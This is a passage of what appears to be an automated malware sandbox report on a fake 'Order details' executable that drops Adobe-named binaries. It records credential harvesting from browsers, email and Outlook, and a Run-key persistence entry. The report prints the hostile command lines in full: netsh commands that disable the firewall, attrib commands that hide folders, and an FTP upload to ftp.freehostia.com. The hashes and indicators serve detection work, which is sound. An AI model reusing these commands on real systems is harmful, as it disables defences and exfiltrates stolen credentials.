| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "CLSID_ContactUserAccountChangeCallback" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "%CommonProgramFiles%\\System\\wab32.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160623085116.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 5f19a0e22cf5ffed07e18e2b00eb7641 |
| SHA1 | e219a8b8019a98399e6d14cedd5add82689806c5 |
| SHA256 | 37d2e60fc99be80debdd072be4e49f10f2d651c95ffd96d662d7c8581ae9bc72 |
| SHA512 | 777539e574400a3036602078c898be2d6803c5c4d12f92b506d374fa75c21d7b976082e5773a94367f69a66621d74e40ba1c3982ebcf693ed37180ae715d7423 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
memory/2768-55-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-57-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-59-0x0000000002A10000-0x0000000002C1C000-memory.dmp
memory/1280-63-0x0000000002A10000-0x0000000002C1C000-memory.dmp
memory/1280-71-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-70-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-73-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-72-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1280-74-0x0000000002A10000-0x0000000002C1C000-memory.dmp
memory/1280-80-0x0000000002A10000-0x0000000002C1C000-memory.dmp
memory/1280-83-0x0000000002A10000-0x0000000002C1C000-memory.dmp
memory/2768-86-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4580-90-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-95-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-96-0x0000000002390000-0x000000000259C000-memory.dmp
memory/2436-100-0x0000000002390000-0x000000000259C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\TEMP:663565B1
| MD5 | 81f0e780cf897cb0ee97e05cf3472f4e |
| SHA1 | 4d87b6866b13211519d44b7e2d70200165098029 |
| SHA256 | b356a635819774c78bce0f10a4b877ea04a3c00d19a485f034cbcdc7807caa55 |
| SHA512 | c5d063e473aef71bd5bbf59e2001db8d1458ccdd578e311eea2f02a1ee97edb6194d484438454ee0fb20f6208c0ceed7f475568f5d8d7b6f710d6753af3e052f |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 2da07277dde6b0c78305319aba6c4e91 |
| SHA1 | 0c66317a6af83fc4c73d2b70935e94d4d0c5c524 |
| SHA256 | 74578b4c0e68105186733f754758f910dddb338f9509b4bee635ef9afb223a69 |
| SHA512 | baa16ded9fb77dc69f65903c2f2ea0fabe233f16cae835afff7a2c50086a45618e615059b24402da5f8fde14063fc4ffbe4e39b0ddf5cd02c1dc4c267dfd4b64 |
memory/2436-109-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-110-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-111-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-112-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2436-113-0x0000000002390000-0x000000000259C000-memory.dmp
memory/2436-119-0x0000000002390000-0x000000000259C000-memory.dmp
memory/4580-120-0x0000000000400000-0x00000000006B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | 006beddfe84578a2167b03bdec363f03 |
| SHA1 | ca6d75910fbadac1bb3a5bd31650ff60b72d77ca |
| SHA256 | bcacc1498cfc898e6420a10f487d3e263577cc13c74dd941e7b14dd58472eb86 |
| SHA512 | a4ffd7fbffd1392742e9abb1cdde0c5c0b75989bac44c1383e0ff32fd0f3ba840de39a0cda7d013873b30a407533f171f1b60e93f6bec3ebcfc2c3017bd25fff |